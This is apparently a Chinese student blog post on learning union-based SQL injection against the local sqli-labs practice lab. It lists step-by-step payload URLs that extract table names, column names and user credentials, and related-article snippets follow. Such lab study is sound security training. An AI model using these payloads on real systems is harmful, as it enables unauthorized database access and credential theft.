2020-10-26 SQL注入学习(2)

最新推荐文章于 2022-05-31 10:20:45 发布
最新推荐文章于 2022-05-31 10:20:45 发布
阅读量292 收藏
点赞数
文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45766062/article/details/109301277
版权

一.get请求与post请求的区别:
(1)get在浏览器回退时是无害的,post会再次提交请求;
(2)get产生的url地址可以被bookmark(加入标签),post不可以;
(3)get请求只能进行url编码,post可以进行多种编码;
(4)get请求参数会被完整保留在浏览器历史记录中,post不会(无痕浏览);
(5)对参数的数据类型,get只接受ASCII字符,post没有限制;
(6)Get请求在url中传递的参数长度有限制,post没有;
(7)Get比post更不安全,因为参数直接暴露在url中,不能用来传递敏感信息;
(8)Get参数放在url中,post参数放在request body中.

1.联合查询注入
(1)一般会将数据库查询的数据回显到页面中。
(2)联合注入的流程:
a、判断注入点
b、判断是整型还是字符型
c、判断查询列数
d、判断显示位
e、获取所有数据库名
f、获取数据库所有表名
g、获取字段名
h、获取字段中的数据
判断注入点:
我们在可能存在SQL注入变量的后边添加以下payload。通过单引号来判断是字符型注入还是整型注入。(加号‘+’在URL中有特殊含义,因此在需要对其进行URL编码为%2b。)
判断注入是整型还是字符型:
在url中输入and1=1或者输入’and 1=1来判断是字符型注入还是整型注入。
在这里插入图片描述
判断查询列数:
通过order by来查询列数,下面两张图对比说明了有第三列没有第四列。
在这里插入图片描述

在这里插入图片描述
判断回显位:作用主要是判断显示数据的位置在哪一列。
只要让第一行查询的结果是空集,即union左边的select子句查询结果为空,那么union右边的查询结果自然就成为了第一行,打印在网页上了
![](https://img-blog.csdnimg.cn/20201028000111253.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzY2MDYy,size_16,color_FFFFFF,t_70#pic_center在这里插入图片描述
这里的?id=-1’就是为了让第一行查询为空集

获取所有数据库名:
group_concat()一次性显示:
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

在这里插入图片描述

获取表名:
http://127.0.0.1/sql/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3%23

获取列名:
http://127.0.0.1/sql/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3%23

获取列中的信息:
http://127.0.0.1/sql/Less-1/?id=-1’ union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3%23

总结:在获取数据库名以后的获取列,表名都是在使用where子句,所以,要掌握查询数据库名的语句。在获取列中的信息中,注意char(32,58,32)表示的是ASCALL码中的对应的空格和冒号。然后要注意的的是联合查询注入攻击中使用union时要使union左边的查询为空集。

问题:为什么在把char(32,58,32)去掉以后就不显示username了。
为什么select1,2,3能够显示回显位(已解决)

KKKKKento
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rConfig v3.9.4 sql注入(CVE-2020-10220)
m0_65150886的博客
01-03 459
rConfig是一款开源的网络配置管理实用程序。rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。利用exp获取用户名密码。1.访问ip:port。
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8623
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
sqli-libs攻略入门(1-4)
shijianyoulei6的博客
06-30 2689
从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。 为了省时间,快速的学习了解SQL注入,这里使用Windows sever 2008 R2+phpstudy环境 首先需要在源代码中添加这两个语句,使网页能够回显执行的有效sql语句 echo”有效输入”.$id.”<br>” echo”执行的sql语句”.$sql...
sql注入——sqlserver联合查询
cxrpty的博客
02-12 639
实验环境:sqlserver 2008 实验步骤: 一、判断是否有注入 分别输入ip/1.php?id=1 and 1=1和ip/1.php?id=1 and 1=2可判断出该处存在注入 二、判断显示位 1.输入http://192.168.1.106/1.php?id=1 order by 3,显示出第三列 2.输入http://192.168.1.106/1.php?id=...
sql-labs 详解
m0_52314120的博客
03-28 1905
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
sqli-labs-master.zip sql注入学习靶机
最新发布
01-18
sql注入学习靶机,由于github经常挂,这里特提供大家下载。
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli...sqli-labs 是一个非常有用的工具,帮助用户学习和实践 SQL 注入的技术。通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
论文研究-基于机器学习SQL注入检测技术研究 .pdf
08-15
基于机器学习SQL注入检测技术研究,韩言平,李祺,日益发展的Web服务给人带来便利的同时,也遭受着形形色色的安全攻击。SQL注入是蝉联数十年OWASP漏洞排行榜之首的注入漏洞类型中最常�
WEB漏洞学习-sql注入
06-11
之前文章中的导图文件,由于个人的在线时间导致大家获取困难,现在放在这里供大家自行取用。
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
复现CVE-2020-11022/11023(jQuery XSS漏洞)
记录并分享学习安全的知识点..
05-31 5750
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
sqli-labs page-1 less-1超精讲解
qq_53425402的博客
08-18 123
1.作为sql注入的题,我们首先要判断是整型注入还是字符型注入。 尝试整型: 第一步:?id=1,返回值正确
web安全学习-------2.sql整数型注入
阿柠xn
03-10 318
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。 我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。 接着我们测试一下数据有几列: 测试列数: GET:id=1 order by 3# POST:id=1’ order by 3# 我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。 接下来就是尝试联合查询了,记得把前面的查询数据置空...
SQL注入中的显示位
weixin_43379478的博客
12-10 3782
我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。所以如果我们想要知...
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析
爱国小白帽
04-07 1668
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x ...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8043
多次跳转导致的ssrf
墨者21道
帅醉了的博客
08-28 909
1.1.1.uWSGI 漏洞复现(CVE-2018-7490) 测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key 1.1.2.Webmin未经身份验证的远程代码执行 测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 受影响的版本:Webmin<=1.920 抓包 修改包 第一步,修改
SQL注入基本步骤
weixin_43902454的博客
07-13 2399
1、注入点测试 2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、爆数据库名 6、爆数据库表名 7、爆字段名
SQL注入-有回显的注入
渗透笔记
01-12 6492
1.MySQL相关 在MySQL 5+版本后,加入了information_schema这个库,该库存放了所有数据库的信息 information_schema.columns包含所有表的字段 字段 table_schema 数据库名 table_name 表名 column_name
sql注入,sqli-lab
07-28
Sqli-lab是一个用于学习和实践SQL注入的实验环境。 在Sqli-lab中,你可以使用各种技术和工具来进行SQL注入攻击,并学习如何修复和防止这类漏洞。这个实验环境提供了一系列具有不同难度级别的注入场景,你可以尝试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值